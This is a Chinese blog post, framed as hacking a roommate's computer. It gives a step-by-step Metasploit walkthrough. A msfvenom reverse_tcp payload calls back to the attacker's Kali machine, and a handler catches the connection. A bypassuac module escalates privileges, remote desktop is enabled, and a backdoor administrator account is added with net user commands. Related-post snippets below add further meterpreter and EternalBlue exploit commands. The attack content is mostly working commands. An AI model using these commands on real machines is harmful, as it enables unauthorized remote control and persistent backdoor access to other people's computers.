今天简单黑一下室友电脑:MSF提权开启远程桌面并连接

已于 2024-01-05 20:13:32 修改
阅读量3.7k 收藏 21
点赞数 2
分类专栏: 程序员 网络安全 黑客技术 文章标签: linux 网络 网络安全
于 2023-01-04 11:48:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kjuhfkicf154/article/details/128545671
版权

kali:172.16.181.8

win sever2012 :172.16.181.4

目标机

win7:172.16.181.9

建立连接

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.181.8 LPORT=4444 -f exe -o 123.exe

把马放入目标机,因为我的虚拟机有点小问题,不能用samba打就直接放马

kali开启监听

use exploit/multi/handler 
set lhost 172.16.181.8 //攻击机ipset payload windows/meterpreter/reverse_tcp run

目标机双击马儿即可建立连接

【原创】MSF简单提权开启远程桌面并连接

提权

查看自己的权限是否为管理员权限

getuid

【原创】MSF简单提权开启远程桌面并连接

当前是user权限要管理员权限才能开启3389

这里要用到bypassuac提权

用background保存到后台,加载bypassuac

use exploit/windows/local/bypassuac 
set session 2run

【原创】MSF简单提权开启远程桌面并连接

可以看见已经是管理员权限了

开启远程桌面

run post/windows/manage/enable_rdp

【原创】MSF简单提权开启远程桌面并连接

用nmap验证一下

【原创】MSF简单提权开启远程桌面并连接

创建用户

进入shell

net user huazai 123 /add

【原创】MSF简单提权开启远程桌面并连接

将用户提升到管理员权限

net localgroup administrators huazai /add

【原创】MSF简单提权开启远程桌面并连接

最后再查看一下

net user

【原创】MSF简单提权开启远程桌面并连接

可以看见已经成功添加了

来到win sever,直接打开mstsc

【原创】MSF简单提权开启远程桌面并连接

输入目标机的ip和用户名,密码连接即可

【原创】MSF简单提权开启远程桌面并连接

成功连接

【原创】MSF简单提权开启远程桌面并连接

在kali里rdesktop也是可以开启远程访问的

学习资源免费分享

img

img
img
img
img

【神兵利器】——187、MSF远程桌面
Fly_鹏程万里
10-16 198
在渗透测试中如果我们获取到了目标服务器的限,此时我们可以考虑查看当前服务器是否有开启远程桌面,如果有开启远程桌面则可以通过图形化界面的方式进行远程操作,更加便捷,更加迅速,如果没有开启远程桌面,那么我们可以通过获取到的shell来执行命令开启远程桌面,随后进行利用。
网络安全系列&网安实践系列:利用MSF对MYSQL进行简单的UDF
weixin_54626591的博客
10-23 182
利用MSF对MYSQL进行简单的UDF
msf拿下windows的远程桌面
mulincong的博客
05-25 1007
msf拿下windows的远程桌面
记一次完整体系的攻防演练的环境部署-映射公网-渗透getshell-上线frp-上线MSF实现内网远程渗透-打开远程桌面
随心所欲不逾矩
02-27 946
前言,本次笔记是记录在工作中的一个攻防演练环境搭建和通过部署的应用存在的文件上传漏洞getshell,接着上线frp,接着上线msf,实现msf远程渗透。准备工作:1,在客户的内网环境部署一个Windows7系统,在这个系统上把finecms这个应用部署上去。把finecms安装之后,和客户沟通,把这个应用的地址映射到公网上去。2,其次,没有条件的话,自己在在wmware上装个虚拟机部署上去也行。
Metasploit msfd插件实现远程访问msf
ropin_os的专栏
03-18 4191
linux下:        //进入msfd sudo msfd //打开连接 msfd -a -P //查看端口是否打开 netstat -tn //远程连接msf nc windows下://打开连接 msf> load msfd ServerName=你的IP地址 ServerPort=你的端口 //查看连接 netstat -na //访问使用telnet telnet   window下可能会出现乱码,这里推荐使用一款开源的软件 putty,附上简单的使用说
MSF远程登录实验
坏坏-5的博客
04-13 3751
本篇是关于使用MSF工具远程控制桌面实验笔记!
网络安全MSF
一直被模仿,从未被超越
03-15 1281
学习,请遵守相关法律法规,严禁用于非法途径。若读者因此作出任何危害网络安全的行为,后果自负,与作者无关。1、当我们通过MSF成功登录靶机时,进行时如果报如下,表示没有拿到系统限。5、我们找到一个漏洞,注意:这里不是每个漏洞都可以成功,要多试几个。6、再次进行渗透,成功出现meterpreter ,代表成功。3、设置 Session。2、使用本地漏洞模块。
利用Metasploit进行Linux
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
使用MSFPC远程控制
y3174445239的博客
06-24 743
切换为root用户之后,可以对安卓机进行最大限的控制,比如关闭selinux、读取文件等。按目标系统分:Windows、Androd、iOS、各种版本的Linux操作系统。Netcat工具的使用:(以Metasploitable 2的80端口为例进行测试)2、输入shell,执行各种命令,如查看操作系统信息、切换到root用户等。按连接方式分:正向、反向(注意:现在大都采用反向远程控制方式)5、打开cmd执行各种命令,如查看文件夹内容、操作系统信息、关机。(2)在安卓虚拟机中弹出示信息,选择“允许”。
利用Msfvenom对Windows进行远程控制
最新发布
2302_79636295的博客
11-01 937
先在kali安装Apache2,下载代码如下 启动Apache2服务 在kali浏览器中输入你的kali IP,得到该页面说明启动成功 这里刚开始的LPORT设为5000,但是在后文会到一些其他情况,后文再说 可以发现已经放进根目录了 启动 Metasploit 控制台,召唤出来一个南瓜头(也召唤出过别的) 使用多重处理程序 设置有效载荷 设置 LHOST 和 LPORT 这里还是用5000,看一下等下发生了啥启动监听器 会发现 后面想了想可能是5000端口被占用或者啥的,反正用不了,这时候可以改一下
[ MSF使用实例 ] 利用远程桌面代码执行漏洞(MS12-020)漏洞导致windows靶机蓝屏
qq_51577576的博客
08-27 1602
Metasploit是一个免费的、可下载的框架, 通过它可以很容易地 获取、开发对计算机软件漏洞实施攻击。它本身 附带数百个 已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。后续会有专门的文章介绍MSF,这里只是一个实例,就不多讲了。...
MSF生成shell连接win2012
李安北的博客
05-07 932
实验环境 kali:192.168.98.168 win2012:192.168.98.167 生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.98.168(kali ip) LPORT=777 -f exe > shell.exe #生成的文件上传到目标机器执行 设置监听 use exploit/multi/handler #创建监听 set payload windows/x64/meterpr
如何正确的远程控制windows sever桌面,msf拿到cmd后运行程序出现“交互式服务检测”解决方案
qq_62931346的博客
07-13 314
​ 利用永恒之蓝拿到windowsshell后尝试执行某些功能,但是多次尝试均发现windows任务栏会出现一个名为"交互式服务检测"的窗口,我们执行的命令(如弹计算器)均会在该窗口内的桌面执行。找到目录为Administrator(当前登陆用户名)的进程,记下进程id。​ 拿到的shell所在进程的pid和当前win桌面进程的pid不相同。再次尝试执行进程(弹计算器)
MSF+FRP实现内网穿透进行远控
dogeable的博客
01-30 2831
MSF+FRP实现内网穿透进行远控
使用msfvenom实现远程控制.
2301_78457119的博客
06-24 965
在Kali 2中生成被控端的工具:msfvenom(msfvenom是渗透测试工具Metasploit中的一个命令)1、查看帮助信息、查2.看所有可以使用的攻击模块3、筛选出使用reverse_tcp的模块。
开启目标远程桌面服务方法总结
Kevin's Blog
11-12 6209
文章目录一、目的二、CMD之远程桌面服务2.1 查看远程桌面是否开启2.2 确认远程端口号是否默认2.3 确认远程桌面服务状态2.4 WMIC开启/关闭远程桌面(推荐)2.5 更改远程桌面端口(附)三、MSF开启目标远程桌面3.1 在MSF shell中开启远程桌面(推荐)3.1.1 优 / 缺点3.1.2 启动远程桌面前 前期工作3.1.3 MSF shell中使用WMIC启动3.2 使用MSF enable_rdp模块3.2.1 优 / 缺点3.2.2 Meterpretr enable_rdp模块中启
metasploit 远程连接服务器
cs_xiaoqiang的博客
01-23 2152
目标ip:192.168.0.101 本机ip:192.168.0.104 打开metasploit 找到到相应的模块,因为我也记不住这个模块,所以先搜索相关的在查找。 找到相应的模块 进入该模块 查看完整的配置信息 这里必要的配置,只有一个,那就是本机ip。因为要在服务器上运行,连接本机ip。 运行,得到相应的代码。 在服务器的命令行下运行这段代码
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
dzqxwzoe的博客
05-31 2525
永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
msf打开win10电脑桌面
10-17
MSF(Metasploit Framework)是一个广泛使用的安全测试框架,主要用于渗透测试和漏洞利用。如果你想通过MSF控制Windows 10电脑访问其桌面,通常你需要进行以下几个步骤: 1. **设置Meterpreter回程连接**:首先,你需要在远程目标上安装 Meterpreter后门,这通常是通过exploit模块完成,比如利用一个已知的Windows漏洞。 ```shell msfconsole use exploit/windows/smb/ms17_010_psexec set payload windows/x64/meterpreter/reverse_https set LHOST=<你的服务器IP> set LPORT=<你的监听端口> run ``` 2. **获取Meterpreter session**:成功执行后,米特大师会尝试在目标机器上启动一个Meterpreter会话。如果一切顺利,你会看到类似 `Session [1] established` 的消息。 3. **命令行操作**:现在你可以使用Meterpreter的命令行界面(cmd.exe的增强版),输入 `shell` 或者 `run post/multi/handle` 来获得一个交互式命令行。然后输入 `control` 加上你想打开的程序名(如 "explorer" 或 "rundll32 user32.dll,ShellExec_RunDLL C:\Windows\System32\rundll32.exe shell32.dll,ShellExecuteEx http://<你的目标地址>")来打开桌面。 请注意,实际操作需要合法授且遵守相关法律法规,这通常用于教育和培训目的,而非未经授的入侵行为。如果你在做渗透测试,请确保得到所有必要的许可。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值